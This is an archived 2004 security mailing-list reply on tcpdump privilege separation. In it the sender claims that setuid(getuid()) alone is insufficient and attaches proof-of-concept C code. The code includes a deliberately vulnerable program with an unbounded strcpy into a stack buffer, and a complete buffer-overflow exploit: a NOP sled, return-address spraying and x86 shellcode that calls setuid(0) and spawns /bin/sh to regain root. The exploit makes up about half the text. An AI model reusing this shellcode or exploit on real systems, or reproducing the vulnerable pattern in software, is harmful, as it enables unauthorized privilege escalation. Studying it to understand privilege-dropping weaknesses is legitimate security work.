Re: OpenBSD work on Tcpdump privilege separation - OFFTOPIC

[Rodrigo Rubira Branco <rodrigo () firewalls com br>]

Pekka,

I attached in this mail one vuln.c program and one exploit.c to 
demonstrate the shellcode calls to setuid(0) and gain root privilegies...

This technique is a single demonstration about I mentionated later.

Thank you,

Rodrigo.

Pekka Savola wrote:
> On Wed, 25 Feb 2004, Rodrigo Rubira Branco wrote:
>
> > Simply call to setuid(getuid()) isn't sufficient, because if an attacker 
> >  discovery buffer overflow, is possibly to he insert call to setuid in 
> > your shellcode, and gain root privilegies.
>
>
> Hmm.. I'm not sure if I understand what you're referrning to?  Could 
> you elaborate + provide a patch or description of the "proper" means?
>
> It is assumed that the attacker would only be able to insert shellcode 
> or exploit the system after the privileges have been dropped -- not 
> before that.
>
> Note that setuid(getuid()) is only done if the binary is setuid root.  
> For regular binary, you'll setuid to the specific account.

--
Rodrigo Rubira Branco
Seguranc,a & Infra-Estrutura
Firewalls Security Corporation
rodrigo () firewalls com br
Tel:  55(14) 3234-5665
Cel:  55(14) 9795-1850
Site:  http://www.firewalls.com.br

Informativo de Privacidade

As informac,o~es contidas neste "email" e nos arquivos anexados sa~o para o uso
exclusivo do destinata'rio aqui indicado, e podem conter segredos 
comerciais, de
propriedade intelectual ou outras informac,o~es confidenciais, protegidas 
pelas
leis aplica'veis.  Caso na~o seja o destinata'rio correto, esteja 
notificado, pelo
presente, que qualquer revisa~o, leitura, co'pia e/ou divulgac,a~o do conteu'do
deste "email" sa~o estritamente proibidas e na~o autorizadas.  Por favor,
apague o conteu'do do "email" e notifique o remetente imediatamente.

Obrigado pela cooperac,a~o.

#include<stdio.h>
#include<stdlib.h>

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
        "\x31\xc0"                      
        "\x31\xdb"                      
        "\xb0\x17"                      
        "\xcd\x80"                      
        "\xeb\x1f"                     
        "\x5e"                          
        "\x89\x76\x08"                  
        "\x31\xc0"                      
        "\x88\x46\x07"                 
        "\x89\x46\x0c"                 
        "\xb0\x0b"                     
        "\x89\xf3"                     
        "\x8d\x4e\x08"                 
        "\x8d\x56\x0c"                 
        "\xcd\x80"                    
        "\x31\xdb"                      
        "\x89\xd8"                      
        "\x40"                          
        "\xcd\x80"                      
        "\xe8\xdc\xff\xff\xff"          
        "/bin/sh";                      

unsigned long get_sp(void)
{
        __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
        long addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
        int i;

        if(argc>1)
                offset=atoi(argv[1]);

        sp=get_sp();
        addr=sp-offset;

        for(i=0;i<bsize;i+=4)
        {
                buff[i+ALIGN]=(addr&0x000000ff);
                buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
                buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
                buff[i+ALIGN+3]=(addr&0xff000000)>>24;
        }

        for(i=0;i<bsize-RANGE*2-strlen(shellcode)-1;i++)
                buff[i]=NOP;

        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08x\n",addr);

        execl("./vuln","vuln",buff,0);
}

#include<string.h>
#include<unistd.h>

int main(int argc,char **argv)
{
        char buffer[1024];
        seteuid(getuid());
        if(argc>1)
                strcpy(buffer,argv[1]);
}